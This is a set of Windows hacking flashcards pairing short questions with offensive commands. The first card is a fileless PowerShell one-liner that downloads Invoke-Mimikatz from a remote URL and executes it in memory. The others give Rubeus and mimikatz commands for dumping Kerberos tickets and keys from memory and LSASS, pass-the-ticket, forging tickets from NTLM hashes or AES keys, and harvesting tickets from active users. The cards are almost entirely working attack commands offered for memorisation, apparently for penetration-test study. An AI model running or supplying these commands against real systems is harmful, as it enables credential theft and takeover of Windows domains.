Windows Hacking Commands Flashcards
Mimikatz fileless download powershell
(New-Object Net.WebClient).DownloadString(‘https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1’) | IEX
How to dump kerberos tickets from memory?
Rubeus.exe dump
How to dump only TGTs from memory?
Rubeus.exe dump /tgt
How to use a ticket (pass the ticket)?
Rubeus.exe ptt /ticket:”C:\path\to\ticket.kirbi”
How to make a kerberos ticket from an NTLM hash?
Rubeus.exe asktgt /domain:[domain] /user:[user] /rc4:[hash] /ptt
How to create a fake logon session with rubeus?
Rubeus.exe createnetonly /program:”C:\Windows\System32\cmd.exe” /show
How to make a TGT with a key?
Rubeus.exe asktgt /domain:[domain] /user:[user] /aes256:[AES_KEY] /ptt
How to dump kerberos keys from lsass?
mimikatz.exe privilege::debug sekurlsa::ekeys exit
How to extract kerberos tickets from active users on a windows host?
Rubeus.exe harvest /interval:30 /nowrap